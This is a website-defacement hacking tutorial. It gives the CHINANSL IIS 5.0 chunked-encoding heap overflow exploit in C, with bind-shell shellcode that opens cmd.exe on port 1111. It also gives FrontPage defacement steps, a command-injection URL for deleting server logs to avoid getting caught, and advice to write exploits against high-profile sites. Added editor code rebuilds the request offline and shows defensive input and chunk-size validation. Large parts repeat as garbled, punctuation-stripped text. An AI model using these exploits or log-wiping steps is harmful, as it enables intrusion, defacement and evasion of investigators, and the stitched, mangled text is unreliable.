        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    char* s1 = "POST ";   /* path, sled and " HTTP/1.1" come from the format string */
    char* s2 = "Accept: */*\r\n";
    char* s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char* s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char* sc = "0\r\n\r\n\r\n";

    /* 8 KB NOP sled with the shellcode at its end; it travels in the request line */
    char shellcodebuff[1024*8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    /* body: a 0x10-byte chunk (pad), two 4-byte chunks (AAAA, BBBB), last-chunk */
    char sendbuff[1024*16];
    memset(sendbuff, 0, 1024*16);
    sprintf(sendbuff, "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, /* srcdata, jmpaddr, */ sc);

    /* take the length first: jmpaddr contains a 0x00 byte, so a strlen() after
       patching would cut the request short */
    int sendlen = strlen(sendbuff);
    *(DWORD*)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD*)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if (result == -1)
    {
        puts("Send shellcode error");
        return -1;
    }

    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff), 0);
    /* a normal HTML reply means the overflow did not take */
    if (strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error! Try again");
        return -1;
    }
    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try run this program again");
    return 0;
}

The code above is what is called exploit code. Exploits are written in languages like C, Perl or sometimes Java, and each one is written for one specific vulnerability. Most of these vulnerabilities were discovered some time ago, and server software and operating systems have since been patched for them, so you cannot simply compile exploit code and break into a server; you must rework the exploit so that it fits your target. The CHINANSL code is a good illustration: it was tested against the Chinese build of Windows 2000 with an unpatched IIS 5.0, and every address it depends on (srcdata, jmpaddr and the kernel32 entry points inside the shellcode) belongs to that build, so against any other build those values have to be found again before the code does anything but crash the server's ASP handler. One more thing I must mention is that you must keep yourself up to date with the latest vulnerabilities by visiting the sites mentioned earlier in the tutorial. I think it is better to write your own exploit code in Perl or C in order to break into websites.

NOTE: I am talking about high-profile websites, not lame websites coded in Notepad.
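The request the exploit above assembles with sprintf() is rebuilt here as an added example (editor's code, not CHINANSL's) so the wire layout can be examined offline: the path, the sled and shellcode in the request line, the three chunks in the body, and the two addresses patched in afterwards. The path, host, the 8-byte stand-in sled and the two addresses are illustrative placeholders taken from the listing, not values that mean anything on a real server.

```c
/* Added example, not part of the CHINANSL code: build the exploit's chunked
 * POST offline so its layout can be inspected.  Path, host, sled contents
 * and the two addresses are illustrative placeholders. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Append n bytes at *pos with a bound check; returns 0 when out is full. */
static int put(char *out, size_t outsz, size_t *pos, const void *src, size_t n)
{
    if (n > outsz - *pos)
        return 0;
    memcpy(out + *pos, src, n);
    *pos += n;
    return 1;
}

static int put_str(char *out, size_t outsz, size_t *pos, const char *s)
{
    return put(out, outsz, pos, s, strlen(s));
}

static void put_le32(char *dst, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        dst[i] = (char)(v >> (8 * i));
}

/* Same wire layout as the exploit's sprintf(): the payload (NOP sled plus
 * shellcode) rides in the request line; the body is a 16-byte pad chunk,
 * a 4-byte "AAAA" chunk, a 4-byte "BBBB" chunk and the last-chunk.  AAAA and
 * BBBB are then overwritten with srcdata and jmpaddr in little-endian order.
 * Returns the request length, or 0 if out is too small.  The length is the
 * byte count of what was assembled, never strlen(): jmpaddr 0x00457494 puts
 * a 0x00 byte into the buffer. */
size_t build_chunked_request(char *out, size_t outsz,
                             const char *path, const char *host,
                             const unsigned char *payload, size_t payload_len,
                             uint32_t srcdata, uint32_t jmpaddr)
{
    static const unsigned char pad[16] = {
        0xcc, 0xcc, 0xcc, 0xcc, 'A', 'D', 'P', 'A',
        0x02, 0x02, 0x02, 0x02, 'P', 'A', 'D', 'P' };
    size_t pos = 0;
    int ok = put_str(out, outsz, &pos, "POST ")
          && put_str(out, outsz, &pos, path)
          && put(out, outsz, &pos, payload, payload_len)
          && put_str(out, outsz, &pos, " HTTP/1.1\r\n")
          && put_str(out, outsz, &pos, "Accept: */*\r\n")
          && put_str(out, outsz, &pos, "Host: ")
          && put_str(out, outsz, &pos, host)
          && put_str(out, outsz, &pos, "\r\n")
          && put_str(out, outsz, &pos, "Content-Type: application/x-www-form-urlencoded\r\n")
          && put_str(out, outsz, &pos, "Transfer-Encoding: chunked\r\n\r\n")
          && put_str(out, outsz, &pos, "10\r\n")          /* chunk-size 0x10 */
          && put(out, outsz, &pos, pad, sizeof pad)
          && put_str(out, outsz, &pos, "\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n0\r\n\r\n\r\n");
    if (!ok)
        return 0;
    /* The placeholders sit at fixed distances from the end (22 and 13 bytes),
     * so the payload itself is never searched for "AAAA". */
    put_le32(out + pos - 22, srcdata);
    put_le32(out + pos - 13, jmpaddr);
    return pos;
}

/* Demo and self-test: builds a small request and checks the properties the
 * text describes.  Returns the request length (192 for these inputs) or 0. */
size_t demo_build_and_check(void)
{
    static char req[1024];
    unsigned char sled[8];
    memset(sled, 0x90, sizeof sled);          /* stand-in for sled + shellcode */
    size_t n = build_chunked_request(req, sizeof req, "/iisstart.asp", "10.0.0.5",
                                     sled, sizeof sled, 0x01e2fb1c - 4, 0x00457494);
    if (n == 0 || memcmp(req, "POST /iisstart.asp\x90", 19) != 0)
        return 0;
    const unsigned char *a = (const unsigned char *)req + n - 22;
    const unsigned char *b = (const unsigned char *)req + n - 13;
    if (a[0] != 0x18 || a[1] != 0xfb || a[2] != 0xe2 || a[3] != 0x01)
        return 0;
    if (b[0] != 0x94 || b[1] != 0x74 || b[2] != 0x45 || b[3] != 0x00)
        return 0;
    if (strlen(req) >= n)                     /* the NUL in jmpaddr hides 10 bytes */
        return 0;
    return n;
}

int main(void)
{
    size_t n = demo_build_and_check();
    printf("request: %zu bytes\n", n);
    return n ? 0 : 1;
}
```

demo_build_and_check() returns 192 for the inputs in the block. Its last check is the reason the exploit computes sendlen before patching the placeholders: the top byte of jmpaddr is 0x00, so a strlen() taken afterwards sees a request 10 bytes shorter than the one that has to go on the wire.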

Keeping yourself safe

You should already be familiar with server software such as Apache and Microsoft IIS, so you know about their log files, which record every request the server receives. Because the log holds the client's IP (Internet Protocol) address alongside the request that was made, a system administrator has no problem identifying the malicious cracker or script kiddie: the IP address is traced back from there.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted, you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. One way to do it is through a command-injection vulnerability in a CGI script: the server passes part of the URL to a command interpreter, and a shell metacharacter in that part makes the interpreter run a second command of your choosing. The following URL deletes a log file that way (log stands for the path of the log file on the server):

http://www.target.com/cgi-bin/test-cgi.bat?|DEL+log

NOTE: The above URL is for Apache for Windows (1.3 releases before 1.3.24), which handed the query string of a .bat CGI script to cmd.exe unfiltered, so the | after the ? ends the script's command line and DEL runs as a second command. This is command execution on the server, not cross-site scripting, and it needs a batch-file CGI to be present on the target.
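The .bat CGI bug above comes down to splicing a decoded query string into a cmd.exe command line. The check below is an added example (editor's code, not from the page and not Apache's) of the validation such a wrapper needs: decode first, then refuse any argument that still carries an interpreter metacharacter or an embedded NUL, so that an encoded %7C is caught as the | it becomes. The metacharacter set and the query strings are illustrative.

```c
/* Added example: validate a CGI query string the way a batch-file CGI
 * wrapper should, decoding before checking.  The metacharacter list and the
 * sample queries are illustrative. */
#include <stdio.h>
#include <string.h>

/* Decode a URL query value in place: '+' -> space, %XX -> byte.  Returns the
 * decoded length, or -1 on a malformed escape. */
long url_decode(char *s)
{
    char *w = s;
    for (const char *r = s; *r; r++) {
        if (*r == '+') { *w++ = ' '; continue; }
        if (*r != '%') { *w++ = *r; continue; }
        int v = 0;
        for (int i = 1; i <= 2; i++) {
            char c = r[i];
            int d;
            if (c >= '0' && c <= '9') d = c - '0';
            else if (c >= 'a' && c <= 'f') d = c - 'a' + 10;
            else if (c >= 'A' && c <= 'F') d = c - 'A' + 10;
            else return -1;                    /* truncated or non-hex escape */
            v = v * 16 + d;
        }
        *w++ = (char)v;
        r += 2;
    }
    *w = '\0';
    return (long)(w - s);
}

/* Characters cmd.exe interprets when an argument is spliced into a command
 * line: pipe, command separators, redirection, escape, variable expansion,
 * quoting and line ends.  A minimal set, not an exhaustive one. */
static const char CMD_META[] = "|&<>^%\"\r\n";

/* 1 if the already decoded argument may be passed on, 0 if it must be rejected. */
int cgi_arg_is_safe(const char *arg)
{
    return strpbrk(arg, CMD_META) == NULL;
}

/* Full check on a raw query string as the server receives it: copy, decode,
 * reject malformed escapes, reject an embedded NUL (decoded length longer
 * than what strlen() sees), then look for metacharacters in the result. */
int query_is_safe(const char *raw_query)
{
    char buf[1024];
    if (strlen(raw_query) >= sizeof buf)
        return 0;
    strcpy(buf, raw_query);
    long n = url_decode(buf);
    if (n < 0 || (size_t)n != strlen(buf))
        return 0;
    return cgi_arg_is_safe(buf);
}

int main(void)
{
    /* constructed sample queries: the tutorial's, an encoded variant, a benign one */
    const char *samples[] = { "bat|DEL+log", "bat%7CDEL+log", "name=value" };
    for (int i = 0; i < 3; i++)
        printf("%-16s -> %s\n", samples[i], query_is_safe(samples[i]) ? "accept" : "reject");
    return 0;
}
```

The order matters: a wrapper that scans the raw query for | and only then decodes it lets bat%7CDEL+log straight through, which is why query_is_safe() decodes into a private copy before it looks at anything.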

In the case of IIS on Windows 2000 you take a different route to the logs: get a DOS shell through telnet and delete them from there.

The CHINANSL code listed above under "Overworking known vulnerabilities to break into a server" exploits a heap overflow in the way IIS 5 on Windows 2000 handles a chunked POST to an .asp file, and its shellcode opens TCP port 1111 on the target and binds cmd.exe to it. If the exploit succeeds, all you have to do is telnet to port 1111 of the target, and the system is yours.

IMPLEMENTATION OF THE CODE

To use the C code, compile it (with MS VC++, as its header says) and run it with three arguments: the target IP, the web port and the path of an .asp file on the server, for example 127.0.0.1 80 /iisstart.asp. The program connects to the port and sends a single POST for that file with Transfer-Encoding: chunked. The NOP sled and the shellcode travel in the request line; the body is a 16-byte pad chunk followed by two 4-byte chunks that the program patches with srcdata and jmpaddr, the values the corrupted heap data is made to use, which redirects execution into the shellcode. The shellcode then creates a listening socket on port 1111 on the target system (not on your own machine), accepts one connection and starts cmd.exe with its input and output tied to it. So once the exploit works there is a shell bound to port 1111 on the target: telnet to port 1111 on the target IP and you are connected to the system without any kind of authentication.

Two things to check when it fails. First, the addresses in the program (srcdata, jmpaddr and the kernel32 entry points inside the shellcode) are those of the Chinese build of Windows 2000 it was tested on and differ on other builds; finding them again is the "overworking" the previous section talks about. Second, the program treats any reply containing <html> as failure, so a server that still answers the request with a page did not take the overflow.
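The overflow the exploit relies on is in the server's handling of the chunk sizes the client sends it. As an added example (editor's code, neither IIS's nor the page's), decode_chunked() is a small chunked-body decoder that applies the check such code needs: the size comes from the client and must be bounded by both the input still in hand and the output buffer before a single byte is copied. The sample bodies, including the exploit's own body with the AAAA/BBBB placeholders still in place, are constructed for the demo.

```c
/* Added example, not from the page: the bounds checks a chunked-body decoder
 * needs.  decode_chunked() refuses any chunk larger than the input left or
 * the output space; the sample bodies are constructed for this demo. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static int crlf_at(const char *in, size_t inlen, size_t ip)
{
    return ip + 2 <= inlen && in[ip] == '\r' && in[ip + 1] == '\n';
}

/* Decode a chunked body into out.  Returns the decoded length, or -1 if the
 * framing is malformed or a chunk would not fit.  Chunk extensions and
 * trailers are rejected to keep the parser small. */
long decode_chunked(const char *in, size_t inlen, char *out, size_t outsz)
{
    size_t ip = 0, op = 0;
    for (;;) {
        /* chunk-size: 1..8 hex digits, so it cannot overflow a 32-bit size_t */
        size_t size = 0, digits = 0;
        while (ip < inlen && digits < 8) {
            char c = in[ip];
            int v;
            if (c >= '0' && c <= '9') v = c - '0';
            else if (c >= 'a' && c <= 'f') v = c - 'a' + 10;
            else if (c >= 'A' && c <= 'F') v = c - 'A' + 10;
            else break;
            size = size * 16 + (size_t)v;
            digits++;
            ip++;
        }
        if (digits == 0 || !crlf_at(in, inlen, ip))
            return -1;
        ip += 2;
        if (size == 0)                       /* last-chunk, then an empty trailer */
            return crlf_at(in, inlen, ip) ? (long)op : -1;
        /* The check that matters: bound the client-supplied size by what was
         * received and by what the buffer can hold before copying anything. */
        if (size > inlen - ip || size > outsz - op)
            return -1;
        memcpy(out + op, in + ip, size);
        op += size;
        ip += size;
        if (!crlf_at(in, inlen, ip))
            return -1;
        ip += 2;
    }
}

/* Demo wrapper: decode a NUL-free sample body into a scratch buffer limited
 * to cap bytes, so the output-bound check can be exercised. */
long decode_to_scratch(const char *body, size_t cap)
{
    static char scratch[256];
    if (cap > sizeof scratch)
        cap = sizeof scratch;
    return decode_chunked(body, strlen(body), scratch, cap);
}

/* The body the exploit sends, with the AAAA/BBBB placeholders unpatched
 * (constructed from the listing; split literals keep "ADPA" out of \xcc). */
static const char EXPLOIT_BODY[] =
    "10\r\n" "\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP" "\r\n"
    "4\r\nAAAA\r\n" "4\r\nBBBB\r\n" "0\r\n\r\n";

long demo_decode_exploit_body(void)
{
    return decode_to_scratch(EXPLOIT_BODY, 256);   /* 16 + 4 + 4 = 24 */
}

int main(void)
{
    printf("exploit body decodes to %ld bytes\n", demo_decode_exploit_body());
    printf("4 GiB chunk size: %ld\n", decode_to_scratch("FFFFFFFF\r\nAAAA\r\n0\r\n\r\n", 256));
    printf("size past end of input: %ld\n", decode_to_scratch("20\r\nAAAA\r\n0\r\n\r\n", 256));
    return 0;
}
```

The well-formed exploit body decodes to 24 bytes; the same decoder returns -1 for a chunk-size of FFFFFFFF, for a size that runs past the end of the received data, for an output buffer too small for the chunk, and for a body missing its final CRLF. Whatever the server does with the decoded bytes afterwards, the copy itself can no longer be driven past a buffer by the size field.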

Various Security Measures

Website defacement has become a serious problem for IT (Information Technology) based companies; every day thousands of websites are defaced. Even government websites are defaced, for different reasons, the most common being cyber war: just as there are wars between rival countries in reality, there are cyber wars in the wired world.

If you want to see the web attack archive, visit the following site:

http://defaced.alldas.org

Now some security measures for system administrators:

- First of all, organize your web root into suitable directories: images in an image directory, server-side content in its own directory, and so on. A web root that is not laid out deliberately leaves your web server prone to many attacks.

- Keep up with the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

- Every web server has vulnerabilities, but there is no need to fear them: download and apply the latest patch for each one. Each attack in this tutorial depends on something a patch or a configuration change removes: FrontPage Server Extensions that accept publishing without proper authorization, the unpatched IIS 5.0 chunked-encoding overflow, and the .bat CGI script that passes its arguments to cmd.exe.

- Finally, you must be able to predict the moves of a malicious cracker or script kiddie. You need to know how a cracker breaks into your site or web server and what the motive behind the attack is, and you must think, act and work like a hacker in order to root the cracker out.

So this completes my tutorial on Defacing Websites. I hope you have understood the inner workings of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 15: Defacing Website

Once you get the HTTP Bad Request you have search for the

homepage Most of the sites have the default homepage as

httpwwwvictimservercommainasp

httpwwwvictimservercomindexhtml

httpwwwvictimservercomindexhtm

httpwwwvictimservercomindexasp

httpwwwvictimservercommainhtm

httpwwwvictimservercommainhtm

httpwwwvictimservercomdefaulthtm

httpwwwvictimservercomdefaultasp

httpwwwvictimservercomdefaulthtml

Keep assaying all possible FrontPage Extensions unless the page

loads If the extension doesnrsquot exist then it will give a 404 Error

Let us say you have got the homepage as

wwwvictimcomindexhtml so design the page which you want

upload or modify the homepage Here the homepage is indexhtml

once you design the page or modify the page save it as

indexhtml

Now open Web Publishing Wizard and follow the steps given

below

- Open Microsoft Web Publishing Wizard

- Now browse the file that you are going to upload Here

indexhtml is the file which we are going to upload

- Now you get a screen where you have to name the web server

Type in anything and click on Advanced

- Select the service provider from the drop down box This is

nothing but the kind of uploading it is going to do Since your

motive is to deface the site select the FrontPage Extended Web

option since this method of defacing works only for FrontPage

enabled sites

- Type the URL of the victim server homepage and in the given

box here it is wwwvictimcomindexhtml

- Here specify the URL that you type in the Web browser to access

the victim server website

- Select the connection method that you use to access the internet

- Click Finish Voila you have successfully replaced the victimrsquos

homepage with yours

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some

coding exploits I am going to present some exploit codes written

in the most powerful programming language C

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

use MS VC++ to compile this piece of code

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

